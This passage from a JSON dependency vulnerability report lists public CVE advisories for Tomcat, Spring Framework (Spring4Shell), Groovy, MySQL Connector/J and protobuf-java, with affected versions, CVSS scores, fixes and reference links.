List","url":"https://lists.apache.org/thread.html/r80e9c8417c77d52c62809168b96912bda70ddf7748f19f8210f745b1@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ce7918faf347e7aac32be930bf26c233b0b140fe37af0bb294158b6@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra5dee390ad2d60307b8362505c059cd6a726de4d146d63dfce1e05e7@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rc31cbabb46cdc58bbdd8519a8f64b6236b2635a3922bbeba0f0e3743@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd547be0c9d821b4b1000a694b8e58ef9f5e2d66db03a31dfe77c4b18@%3Cusers.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1935"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1935"},{"summary":"NetApp Advisory ntap-20200327-0005","url":"https://security.netapp.com/advisory/ntap-20200327-0005"},{"summary":"Debian Advisory dsa-4673","url":"https://www.debian.org/security/2020/dsa-4673"},{"summary":"Debian Advisory dsa-4680","url":"https://www.debian.org/security/2020/dsa-4680"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory 
cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":4.8,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":4.8,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":4.8,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"]}],"title":"CVE-2020-1935/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-45648"]}],"cve":"CVE-2023-45648","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2023-10-10T21:31:12","ids":[{"system_name":"CVE Record","text":"CVE-2023-45648"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp Advisory","text":"ntap-20231103-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Improper Input Validation vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Improper Input Validation vulnerability Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. 
A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue. ## Related CVE(s) BIT-tomcat-2023-45648, CVE-2023-45648"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/10/10"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/2pv8yz1pyp088tsxfb7ogltk9msk0jdp"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45648"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45648"},{"summary":"NetApp Advisory ntap-20231103-0007","url":"https://security.netapp.com/advisory/ntap-20231103-0007"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory 
dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-45648/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22965"]}],"cve":"CVE-2022-22965","cwe":{"id":"74","name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component"},"discovery_date":"2022-03-31T18:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-22965"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2022-0005"},{"system_name":"Cisco Advisory","text":"cisco-sa-java-spring-rce-Zx9GUc67"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22965"},{"system_name":"Siemens Advisory","text":"ssa-254054"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Remote Code Execution in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Remote Code 
Execution in Spring Framework Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. ## Impact A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. These are the prerequisites for the exploit: - JDK 9 or higher - Apache Tomcat as the Servlet container - Packaged as WAR - `spring-webmvc` or `spring-webflux` dependency ## Patches - Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE) - Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12) ## Workarounds For those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting. To apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. 
In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux)."}],"product_status":{"known_affected":["org.springframework/spring-webmvc@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/166713/Spring4Shell-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html"},{"summary":"Siemens Advisory ssa-254054","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Sonicwall Advisory SNWLID-2022-0005","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005"},{"summary":"Vmware Advisory cve-2022-22965","url":"https://tanzu.vmware.com/security/cve-2022-22965"},{"summary":"Cisco Advisory cisco-sa-java-spring-rce-Zx9GUc67","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework/spring-webmvc@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22965/pkg:maven/org.springframework/spring-webmvc@4.3.6.RELEASE?type=jar"},{"cve":"CVE-2020-17521","cwe":{"id":"379","name":"Creation of Temporary File in Directory with Insecure Permissions"},"discovery_date":"2020-12-09T19:03:03","ids":[{"system_name":"CVE Record","text":"CVE-2020-17521"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20201218-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Apache Groovy"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Apache Groovy Apache Groovy provides extension methods to aid with creating temporary directories. 
Prior to this fix, Groovy's implementation of those extension methods was using a now superseded Java JDK method call that is potentially not secure on some operating systems in some contexts. Users not using the extension methods mentioned in the advisory are not affected, but may wish to read the advisory for further details. Versions Affected: 2.0 to 2.4.20, 2.5.0 to 2.5.13, 3.0.0 to 3.0.6, and 4.0.0-alpha-1. Fixed in versions 2.4.21, 2.5.14, 3.0.7, 4.0.0-alpha-2."}],"product_status":{"known_affected":["org.codehaus.groovy/groovy@vers:maven/>=2.0.0|<2.4.21"],"known_not_affected":["org.codehaus.groovy/groovy@2.4.21"]},"references":[{"summary":"Cve 2020","url":"https://groovy-lang.org/security.html#CVE-2020-17521"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4b2f13c302eec98838ff7475253091fb9b75bc1038016ba00ebf6c08@%3Cdev.atlas.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra9dab34bf8625511f23692ad0fcee2725f782e9aad6c5cdff6cf4465@%3Cnotifications.groovy.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea63a4666ba245d2892471307772a2d8ce0f0741f341d6576625c1b3@%3Cdev.atlas.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-17521"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-17521"},{"summary":"NetApp Advisory ntap-20201218-0006","url":"https://security.netapp.com/advisory/ntap-20201218-0006"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory 
cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.codehaus.groovy/groovy@vers:maven/>=2.0.0|<2.4.21"]}],"title":"CVE-2020-17521/pkg:maven/org.codehaus.groovy/groovy@2.4.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-21363"]}],"cve":"CVE-2022-21363","cwe":{"id":"280","name":"Improper Handling of Insufficient Permissions or Privileges "},"discovery_date":"2022-01-20T00:00:48","ids":[{"system_name":"CVE Record","text":"CVE-2022-21363"},{"system_name":"Oracle Advisory","text":"cpujan2022"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Handling of Insufficient Permissions or Privileges in MySQL Connectors Java"},{"category":"details","details":"Vulnerability Details","text":"# Improper Handling of Insufficient Permissions or Privileges in MySQL Connectors Java Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. 
Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)."}],"product_status":{"known_affected":["mysql/mysql-connector-java@vers:maven/>=2.0.14|<=8.0.27"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21363"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21363"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["mysql/mysql-connector-java@vers:maven/>=2.0.14|<=8.0.27"]}],"title":"CVE-2022-21363/pkg:maven/mysql/mysql-connector-java@8.0.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-2471"]}],"cve":"CVE-2021-2471","cwe":{"id":"863","name":"Incorrect Authorization"},"discovery_date":"2022-05-24T19:18:20","ids":[{"system_name":"CVE Record","text":"CVE-2021-2471"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle 
Advisory","text":"cpuoct2021"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Incorrect Authorization in MySQL Connector Java"},{"category":"details","details":"Vulnerability Details","text":"# Incorrect Authorization in MySQL Connector Java Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. CVSS 3.1 Base Score 5.9 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H)."}],"product_status":{"known_affected":["mysql/mysql-connector-java@vers:maven/>=8.0.0|<8.0.27"],"known_not_affected":["mysql/mysql-connector-java@8.0.27"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-2471"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-2471"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["mysql/mysql-connector-java@vers:maven/>=8.0.0|<8.0.27"]}],"title":"CVE-2021-2471/pkg:maven/mysql/mysql-connector-java@8.0.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-22570"]}],"cve":"CVE-2021-22570","cwe":{"id":"476","name":"NULL Pointer Dereference"},"discovery_date":"2022-01-27T00:01:15","ids":[{"system_name":"CVE Record","text":"CVE-2021-22570"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"NetApp Advisory","text":"ntap-20220429-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"NULL Pointer Dereference in Protocol Buffers"},{"category":"details","details":"Vulnerability Details","text":"# NULL Pointer Dereference in Protocol Buffers Nullptr dereference when a null char is present in a proto symbol. The symbol is parsed incorrectly, leading to an unchecked call into the proto file's name during generation of the resulting error message. Since the symbol is incorrectly parsed, the file is nullptr. We recommend upgrading to version 3.15.0 or greater. 
## Related CVE(s) CVE-2021-22570, PYSEC-2022-48"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.15.0"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/04/msg00019.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DVUZPALAQ34TQP6KFNLM4IZS6B32XSA"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PAGL5M2KGYPN3VEQCRJJE6NA7D5YG5X"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BTRGBRC5KGCA4SK5MUNLPYJRAGXMBIYY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IFX6KPNOFHYD6L4XES5PCM3QNSKZBOTQ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KQJB6ZPRLKV6WCMX2PRRRQBFAOXFBK6B"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRWRAXAFR3JR7XCFWTHC2KALSZKWACCE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NVTWVQRB5OCCTMKEQFY5MYED3DXDVSLP"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22570"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22570"},{"summary":"NetApp Advisory ntap-20220429-0005","url":"https://security.netapp.com/advisory/ntap-20220429-0005"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2021-22570/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-3510"]}],"cve":"CVE-2022-3510","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-12-12T15:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2022-3510"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Protobuf Java vulnerable to Uncontrolled Resource Consumption"},{"category":"details","details":"Vulnerability Details","text":"# Protobuf Java vulnerable to Uncontrolled Resource Consumption A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. 
We recommend updating to the versions mentioned above."}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.21.7"]},"references":[{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3510"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3510"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3510/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-3509"]}],"cve":"CVE-2022-3509","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-12-12T15:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2022-3509"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Protobuf Java vulnerable to Uncontrolled Resource Consumption"},{"category":"details","details":"Vulnerability Details","text":"# Protobuf Java vulnerable to Uncontrolled Resource Consumption A parsing issue similar to CVE-2022-3171, but with textformat in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a 
denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above."}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.21.7"]},"references":[{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3509"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3509"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3509/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"GitHub","urls":["https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2022-3171.yml"]}],"cve":"CVE-2022-3171","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-10-04T22:17:15","ids":[{"system_name":"CVE Record","text":"CVE-2022-3171"},{"system_name":"GitHub Advisory","text":"GHSA-h4h5-3hr4-j3g2"},{"system_name":"Gentoo 
Advisory","text":"glsa-202301-09"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"protobuf-java has a potential Denial of Service issue"},{"category":"details","details":"Vulnerability Details","text":"# protobuf-java has a potential Denial of Service issue ## Summary A potential Denial of Service issue in `protobuf-java` core and lite was discovered in the parsing procedure for binary and text format data. Input streams containing multiple instances of non-repeated [embedded messages](http://developers.google.com/protocol-buffers/docs/encoding#embedded) with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. Reporter: [OSS Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771) Affected versions: This issue affects both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime. 
